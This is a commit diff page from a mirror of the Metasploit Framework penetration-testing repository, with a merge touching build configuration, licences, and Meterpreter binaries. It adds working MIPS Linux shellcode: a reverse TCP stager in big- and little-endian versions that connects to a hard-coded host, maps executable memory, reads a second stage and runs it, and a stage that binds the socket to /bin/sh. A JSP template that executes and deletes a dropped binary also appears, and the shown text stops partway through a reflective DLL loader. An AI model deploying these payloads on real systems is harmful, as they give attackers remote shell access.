infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'upstream/master' into enum_ad_perf

bug/bundler_fix
Meatballs 2014-01-21 21:00:51 +00:00
parent 3bf728da61 7660e2d3b7
commit 720f892e2f
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
267 changed files with 9209 additions and 4624 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
.mailmap
View File

@ -2,6 +2,7 @@ bturner-r7 <bturner-r7@github> Brandon Turner <brandon_turner@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <David_Maloney@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com>
farias-r7 <farias-r7@github> Fernando Arias <fernando_arias@rapid7.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hd_moore@rapid7.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net>
jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt
@ -13,14 +14,16 @@ jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan_vazquez@rapid7.com>
limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com>
shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com>
tasos-r7 <tasos-r7@github> Tasos Laskos <Tasos_Laskos@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@packetfu.com>
trosen-r7 <trosen-r7@github> Trevor Rosen <Trevor_Rosen@rapid7.com>
wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@nmt.edu>
# Above this line are current Rapid7 employees. Below this paragraph are
# volunteers, former employees, and potential Rapid7 employees who, at
@ -72,9 +75,18 @@ OJ <oj@github> OJ Reeves <oj@buffered.io>
OJ <oj@github> OJ <oj@buffered.io>
r3dy <r3dy@github> Royce Davis <r3dy@Royces-MacBook-Pro.local>
r3dy <r3dy@github> Royce Davis <royce.e.davis@gmail.com>
Rick Flores <0xnanoquetz9l@gmail.com> Rick Flores (nanotechz9l) <0xnanoquetz9l@gmail.com>
rsmudge <rsmudge@github> Raphael Mudge <rsmudge@gmail.com> # Aka `butane
schierlm <schierlm@github> Michael Schierl <schierlm@gmx.de> # Aka mihi
scriptjunkie <scriptjunkie@github> Matt Weeks <scriptjunkie@scriptjunkie.us>
skape <skape@???> Matt Miller <mmiller@hick.org>
spoonm <spoonm@github> Spoon M <spoonm@gmail.com>
swtornio <swtornio@github> Steve Tornio <swtornio@gmail.com>
Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
TrustedSec <davek@trustedsec.com> trustedsec <davek@trustedsec.com>
# Aliases for utility author names. Since they're fake, typos abound
Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>

6
.travis.yml
View File

@ -1,11 +1,13 @@
language: ruby
before_install:
- rake --version
- sudo apt-get update -qq
- sudo apt-get install -qq libpcap-dev
before_script:
- cp config/database.yml.travis config/database.yml
- rake db:create
- rake db:migrate
- bundle exec rake --version
- bundle exec rake db:create
- bundle exec rake db:migrate
rvm:
#- '1.8.7'

2
Gemfile
View File

@ -19,7 +19,7 @@ group :db do
# Needed for Msf::DbManager
gem 'activerecord'
# Database models shared between framework and Pro.
gem 'metasploit_data_models', '~> 0.16.6'
gem 'metasploit_data_models', '~> 0.16.9'
# Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11'
end

4
Gemfile.lock
View File

@ -22,7 +22,7 @@ GEM
fivemat (1.2.1)
i18n (0.6.5)
json (1.8.0)
metasploit_data_models (0.16.6)
metasploit_data_models (0.16.9)
activerecord (>= 3.2.13)
activesupport
pg
@ -67,7 +67,7 @@ DEPENDENCIES
factory_girl (>= 4.1.0)
fivemat (= 1.2.1)
json
metasploit_data_models (~> 0.16.6)
metasploit_data_models (~> 0.16.9)
msgpack
network_interface (~> 0.0.1)
nokogiri

87
LICENSE
View File

@ -41,93 +41,10 @@ Copyright: 2004-2005 vlad902 <vlad902 [at] gmail.com>
2007 H D Moore <hdm [at] metasploit.com>
License: GPL-2 and Artistic
Files: external/source/meterpreter/ReflectiveDLLInjection/*
Copyright: 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
Files: external/source/ReflectiveDLLInjection/*
Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
License: BSD-3-clause
Files: external/source/meterpreter/source/common/queue.h
Copyright: 1991, 1993 The Regents of the University of California
License: BSD-3-clause
Files: external/source/meterpreter/source/common/zlib/* external/source/meterpreter/source/server/zlib/*
Copyright: 1995-1996 Jean-loup Gailly and Mark Adler
License: Zlib
Files: external/source/meterpreter/source/bionic/libc/*
Copyright: 2005-2008, The Android Open Source Project
2004 by Internet Systems Consortium, Inc. ("ISC")
1995,1996,1999 by Internet Software Consortium
1995 by International Business Machines, Inc.
1997,1998,1999,2004 The NetBSD Foundation, Inc.
1993 Christopher G. Demetriou
1983,1985,1989,1993 The Regents of the University of California
2000 Ben Harris
1995,1996,1997,1998 WIDE Project
2003 Networks Associates Technology, Inc.
1993 by Digital Equipment Corporation
1997 Mark Brinicombe
1993 Martin Birgmeier
1993 by Sun Microsystems, Inc.
1997, 2005 Todd C. Miller <Todd.Miller@courtesan.com>
1995, 1996 Carnegie-Mellon University
2003 Networks Associates Technology, Inc.
License: BSD-3-clause and BSD-4-clause
Files: external/source/meterpreter/source/bionic/libdl/*
Copyright: 2007 The Android Open Source Project
License: BSD-3-clause
Files: external/source/meterpreter/source/bionic/libm/*
Copyright: 2003, Steven G. Kargl
2003 Mike Barcroft <mike@FreeBSD.org>
2002-2005 David Schultz <das@FreeBSD.ORG>
2004 Stefan Farfeleder
2003 Dag-Erling Coïdan Smørgrav
1996 The NetBSD Foundation, Inc.
1985,1988,1991,1992,1993 The Regents of the University of California
1993,94 Winning Strategies, Inc.
1993, 2004 by Sun Microsystems, Inc.
License: BSD-2-clause and BSD-3-clause and BSD-4-clause
Files: external/source/meterpreter/source/extensions/espia/screen.c
Copyright: 1994-2008, Mark Hammond
License: BSD-2-clause
Files: external/source/meterpreter/source/extensions/priv/server/timestomp.c
Copyright: 2005 Vincent Liu
License: GPL-2
Files: external/source/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c external/source/meterpreter/source/screenshot/bmp2jpeg.c
Copyright: 1994-2008, Mark Hammond
License: BSD-2-clause
Files: external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun.c
Copyright: 2010, patrickHVE@googlemail.com
License: BSD-2-clause
Files: external/source/meterpreter/source/pssdk/*
Copyright: microOLAP
License: N/A
Comment: HD Moore holds a single-seat developer license for the Packet Sniffer
SDK library embedded into the Meterpreter Sniffer extension. This
source code is not distributed with Metasploit Framework.
Files: external/source/meterpreter/source/openssl/*
Copyright: 1998-2002 The OpenSSL Project
License: OpenSSL and SSLeay
Files: external/source/meterpreter/source/server/posix/sfsyscall.h
Copyright: 2003 Philippe Biondi <biondi@cartel-securite.fr>
License: LGPL
Files: external/source/meterpreter/source/jpeg-8/*
Copyright: 1991-2010, Thomas G. Lane, Guido Vollbeding
License: BSD-3-clause
Files: external/source/meterpreter/source/libpcap/*
Copyright: 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997 The Regents of the University of California.
License: BSD-4-clause
Files: external/source/metsvc/*
Copyright: 2007, Determina Inc.
License: BSD-3-clause

BIN
data/meterpreter/elevator.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/elevator.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_extapi.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_extapi.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_networkpug.lso
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.lso
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.lso
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.x86.dll
View File

Binary file not shown.

7
data/meterpreter/meterpreter.py
View File

@ -158,15 +158,10 @@ class STDProcessBuffer(threading.Thread):
self.data_lock = threading.RLock()
def run(self):
while self.is_alive():
byte = self.std.read(1)
for byte in iter(lambda: self.std.read(1), ''):
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
data = self.std.read()
self.data_lock.acquire()
self.data += data
self.data_lock.release()
def is_read_ready(self):
return len(self.data) != 0

BIN
data/meterpreter/metsrv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/metsrv.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/msflinker_linux_x86.bin
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x86.dll
View File

Binary file not shown.

10
data/templates/scripts/to_exe_jsp.war.template
View File

@ -39,11 +39,13 @@
if (%{var_proc}.waitFor() == 0) {
%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
}
File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
}
else
}
else
{
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
String[] %{var_exepatharray} = new String[1];
%{var_exepatharray}[0] = %{var_exepath};
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
}
%%>

BIN
data/vncdll.dll
View File

Binary file not shown.

BIN
data/vncdll.x64.dll
View File

Binary file not shown.

BIN
data/vncdll.x86.dll Executable file
View File

Binary file not shown.

16
documentation/gendocs.sh
View File

@ -1,15 +1 @@
OPTS="-x .ut.rb -x .ts.rb -x samples -q"
BASE="$(dirname "$0")"
MSFDIR="${BASE}/.."
DOCDIR="${BASE}/api"
doc=$(which sdoc)
if [ -z $doc ]; then
doc=$(which rdoc)
fi
echo "Using ${doc} for doc generation"
echo "Putting docs in ${DOCDIR}"
$doc $OPTS -t "Metasploit Documentation" -o ${DOCDIR} ${MSFDIR}/lib/rex ${MSFDIR}/lib/msf
rake yard

3
external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj vendored
View File

@ -70,7 +70,8 @@
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>

152
external/source/exploits/cve-2013-3660/.gitignore vendored Normal file
View File

@ -0,0 +1,152 @@
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.sln.docstates
# Build results
[Dd]ebug/
[Rr]elease/
x64/
build/
[Bb]in/
[Oo]bj/
# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
!packages/*/build/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
*_i.c
*_p.c
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.log
*.scc
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opensdf
*.sdf
*.cachefile
# Visual Studio profiler
*.psess
*.vsp
*.vspx
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
*.ncrunch*
.*crunch*.local.xml
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.Publish.xml
*.pubxml
# NuGet Packages Directory
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
#packages/
# Windows Azure Build Output
csx
*.build.csdef
# Windows Store app package directory
AppPackages/
# Others
sql/
*.Cache
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.[Pp]ublish.xml
*.pfx
*.publishsettings
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file to a newer
# Visual Studio version. Backup files are not needed, because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
App_Data/*.mdf
App_Data/*.ldf
# =========================
# Windows detritus
# =========================
# Windows image file caches
Thumbs.db
ehthumbs.db
# Folder config file
Desktop.ini
# Recycle Bin used on file shares
$RECYCLE.BIN/
# Mac crap
.DS_Store

75
external/source/shellcode/linux/mips/stage_tcp_shell.s vendored Normal file
View File

@ -0,0 +1,75 @@
##
#
# Name: stage_tcp_shell
# Type: Stage
# Qualities: Compatible with both mips little and big endian
# Platforms: Linux
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>
# License:
#
# This file is part of the Metasploit Exploit Framework
# and is subject to the same licenses and copyrights as
# the rest of this package.
#
# Description:
#
# This payload duplicates stdio, stdin and stderr to a file descriptor,
# stored on $s2, and executes /bin/sh.
#
# Assemble and create a relocatable object with:
# as -o stage_tcp_shell.o stage_tcp_shell.s
#
# Assemble, link and create an executable ELF with:
# gcc -o stage_tcp_shell stage_tcp_shell.s
#
# The tool "tools/metasm_shell.rb" can be used to easily
# generate the string to place on:
# modules/payloads/stages/linux/mipsle/shell.rb
# and:
# modules/payloads/stages/linux/mipsbe/shell.rb
##
.text
.align 2
.globl main
.set nomips16
main:
.set noreorder
.set nomacro
# dup2(sockfd, 2)
# dup2(sockfd, 1)
# dup2(sockfd, 0)
# a0: oldfd (sockfd)
# a1: newfd (2, 1, 0)
# v0: syscall = __NR_dup2 (4063)
li $s1, -3
nor $s1, $s1, $zero
add $a0, $s2, $zero
dup2_loop:
add $a1, $s1, $zero # dup2_loop
li $v0, 4063 # sys_dup2
syscall 0x40404
li $s0, -1
addi $s1, $s1, -1
bne $s1, $s0, dup2_loop # <dup2_loop>
# execve("/bin/sh", ["/bin/sh"], NULL)
# a0: filename "/bin/sh"
# a1: argv ["/bin/sh", NULL]
# a2: envp NULL
# v0: syscall = __NR_dup2 (4011)
li $t8, -1 # load t8 with -1
getaddr: # getaddr trick from scut@team-teso.net
bltzal $t8, getaddr # branch with $ra stored if t8 < 0
slti $t8, $zero, -1 # delay slot instr: $t8 = 0 (see below)
addi $a0, $ra, 28 # $ra gets this address
sw $a0, -8($sp)
sw $zero, -4($sp)
addi $a1, $sp, -8
slti $a2, $zero,-1
li $v0, 4011 # sys_execve
syscall 0x40404
.string "/bin/sh"
.set macro
.set reorder

127
external/source/shellcode/linux/mipsbe/stager_sock_reverse.s vendored Normal file
View File

@ -0,0 +1,127 @@
##
#
# Name: stager_sock_reverse
# Type: Stager
# Qualities: No Nulls out of the IP / Port data
# Platforms: Linux MIPS Big Endian
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>
# License:
#
# This file is part of the Metasploit Exploit Framework
# and is subject to the same licenses and copyrights as
# the rest of this package.
#
# Description:
#
# Implementation of a MIPS BE Linux reverse TCP stager.
#
# File descriptor in $s2.
#
# Assemble and create a relocatable object with:
# as -o stager_sock_reverse.o stager_sock_reverse.s
#
# Assemble, link and create an executable ELF with:
# gcc -o stager_sock_reverse stager_sock_reverse.s
#
# The tool "tools/metasm_shell.rb" can be used to easily
# generate the string to place on:
# modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb
##
.text
.align 2
.globl main
.set nomips16
main:
.set noreorder
.set nomacro
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
# a0: domain = PF_INET (2)
# a1: type = SOCK_STREAM (2)
# a2: protocol = IPPROTO_IP (0)
# v0: syscall = __NR_socket (4183)
li $t7, -6
nor $t7, $t7, $zero
addi $a0, $t7, -3
addi $a1, $t7, -3
slti $a2, $zero, -1
li $v0, 4183
syscall 0x40404
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
# a0: sockfd
# a1: addr = AF_INET (2)
# a2: addrlen = 16
# v0: syscall = __NR_connect (4170)
lw $a0, -4($sp)
li $t7, -3
nor $t7, $t7, $zero
sw $t7, -32($sp)
lui $t6, 0x115c
sw $t6, -28($sp)
lui $t6, 0x7f00 # ip
ori $t6, $t6, 0x0001 # ip
sw $t6, -26($sp)
addiu $a1, $sp, -30
li $t4, -17
nor $a2, $t4, $zero
li $v0, 4170
syscall 0x40404
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
# a0: addr = -1
# a1: lenght = 4096
# a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
# sp(16): fd = -1
# sp(20): offset = 0
# v0: syscall = __NR_mmap (4090)
li $a0, -1
li $a1, 4097
addi $a1, $a1, -1
li $t1, -8
nor $t1, $t1, $0
add $a2, $t1, $0
li $a3, 2050
li $t3, -22
nor $t3, $t3, $zero
add $t3, $sp, $t3
sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
li $v0, 4090
syscall 0x40404
sw $v0, -8($sp) # Stores the mmap'ed address on the stack
# read(sockfd, addr, 4096)
# a0: sockfd
# a1: addr
# a2: len = 4096
# v0: syscall = __NR_read (4003)
lw $a0, -4($sp)
lw $a1, -8($sp)
li $a2, 4097
addi $a2, $a2, -1
li $v0, 4003
syscall 0x40404
# cacheflush(addr, nbytes, DCACHE)
# a0: addr
# a1: nbytes
# a2: cache = DCACHE (2)
# v0: syscall = __NR_read (4147)
lw $a0, -8($sp)
add $a1, $v0, $zero
li $t1, -3
nor $t1, $t1, $0
add $a2, $t1, $0
li $v0, 4147
syscall 0x40404
# jmp to the stage
lw $s1, -8($sp)
lw $s2, -4($sp)
jalr $s1
.set macro
.set reorder

127
external/source/shellcode/linux/mipsle/stager_sock_reverse.s vendored Normal file
View File

@ -0,0 +1,127 @@
##
#
# Name: stager_sock_reverse
# Type: Stager
# Qualities: No Nulls out of the IP / Port data
# Platforms: Linux MIPS Little Endian
# Authors: juan vazquez <juan.vazquez [at] metasploit.com>
# License:
#
# This file is part of the Metasploit Exploit Framework
# and is subject to the same licenses and copyrights as
# the rest of this package.
#
# Description:
#
# Implementation of a MIPS LE Linux reverse TCP stager.
#
# File descriptor in $s2.
#
# Assemble and create a relocatable object with:
# as -o stager_sock_reverse.o stager_sock_reverse.s
#
# Assemble, link and create an executable ELF with:
# gcc -o stager_sock_reverse stager_sock_reverse.s
#
# The tool "tools/metasm_shell.rb" can be used to easily
# generate the string to place on:
# modules/payloads/stagers/linux/mipsle/reverse_tcp.rb
##
.text
.align 2
.globl main
.set nomips16
main:
.set noreorder
.set nomacro
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
# a0: domain = PF_INET (2)
# a1: type = SOCK_STREAM (2)
# a2: protocol = IPPROTO_IP (0)
# v0: syscall = __NR_socket (4183)
li $t7, -6
nor $t7, $t7, $zero
addi $a0, $t7, -3
addi $a1, $t7, -3
slti $a2, $zero, -1
li $v0, 4183
syscall 0x40404
sw $v0, -4($sp) # store the file descriptor for the socket on the stack
# connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16)
# a0: sockfd
# a1: addr = AF_INET (2)
# a2: addrlen = 16
# v0: syscall = __NR_connect (4170)
lw $a0, -4($sp)
li $t7, -3
nor $t7, $t7, $zero
sw $t7, -30($sp)
ori $t6, $zero, 0x5c11 # port
sw $t6, -28($sp)
lui $t6, 0x100 # ip
ori $t6, $t6, 0x7f # ip
sw $t6, -26($sp)
addiu $a1, $sp, -30
li $t4, -17
nor $a2, $t4, $zero
li $v0, 4170
syscall 0x40404
# mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
# a0: addr = -1
# a1: lenght = 4096
# a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7)
# a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050)
# sp(16): fd = -1
# sp(20): offset = 0
# v0: syscall = __NR_mmap (4090)
li $a0, -1
li $a1, 4097
addi $a1, $a1, -1
li $t1, -8
nor $t1, $t1, $0
add $a2, $t1, $0
li $a3, 2050
li $t3, -22
nor $t3, $t3, $zero
add $t3, $sp, $t3
sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls
sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls
li $v0, 4090
syscall 0x40404
sw $v0, -8($sp) # Stores the mmap'ed address on the stack
# read(sockfd, addr, 4096)
# a0: sockfd
# a1: addr
# a2: len = 4096
# v0: syscall = __NR_read (4003)
lw $a0, -4($sp)
lw $a1, -8($sp)
li $a2, 4097
addi $a2, $a2, -1
li $v0, 4003
syscall 0x40404
# cacheflush(addr, nbytes, DCACHE)
# a0: addr
# a1: nbytes
# a2: cache = DCACHE (2)
# v0: syscall = __NR_read (4147)
lw $a0, -8($sp)
add $a1, $v0, $zero
li $t1, -3
nor $t1, $t1, $0
add $a2, $t1, $0
li $v0, 4147
syscall 0x40404
# jmp to the stage
lw $s1, -8($sp)
lw $s2, -4($sp) # sockfd saved on $s2
jalr $s1
.set macro
.set reorder

152
external/source/vncdll/.gitignore vendored Normal file
View File

@ -0,0 +1,152 @@
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.sln.docstates
# Build results
[Dd]ebug/
[Rr]elease/
x64/
build/
[Bb]in/
[Oo]bj/
# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
!packages/*/build/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
*_i.c
*_p.c
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.log
*.scc
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opensdf
*.sdf
*.cachefile
# Visual Studio profiler
*.psess
*.vsp
*.vspx
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
*.ncrunch*
.*crunch*.local.xml
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.Publish.xml
*.pubxml
# NuGet Packages Directory
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
#packages/
# Windows Azure Build Output
csx
*.build.csdef
# Windows Store app package directory
AppPackages/
# Others
sql/
*.Cache
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.[Pp]ublish.xml
*.pfx
*.publishsettings
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file to a newer
# Visual Studio version. Backup files are not needed, because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
App_Data/*.mdf
App_Data/*.ldf
# =========================
# Windows detritus
# =========================
# Windows image file caches
Thumbs.db
ehthumbs.db
# Folder config file
Desktop.ini
# Recycle Bin used on file shares
$RECYCLE.BIN/
# Mac crap
.DS_Store

131
external/source/vncdll/loader/LoadLibraryR.c vendored
View File

@ -1,131 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "LoadLibraryR.h"
//===============================================================================================//
DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
{
WORD wIndex = 0;
PIMAGE_SECTION_HEADER pSectionHeader = NULL;
PIMAGE_NT_HEADERS pNtHeaders = NULL;
pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
if( dwRva < pSectionHeader[0].PointerToRawData )
return dwRva;
for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
{
if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )
return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
}
return 0;
}
//===============================================================================================//
DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
{
UINT_PTR uiBaseAddress = 0;
UINT_PTR uiExportDir = 0;
UINT_PTR uiNameArray = 0;
UINT_PTR uiAddressArray = 0;
UINT_PTR uiNameOrdinals = 0;
DWORD dwCounter = 0;
#ifdef _WIN64
DWORD dwMeterpreterArch = 2;
#else
DWORD dwMeterpreterArch = 1;
#endif
uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
// get the File Offset of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// currenlty we can only process a PE file which is the same type as the one this fuction has
// been compiled as, due to various offset in the PE structures being defined at compile time.
if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
{
if( dwMeterpreterArch != 1 )
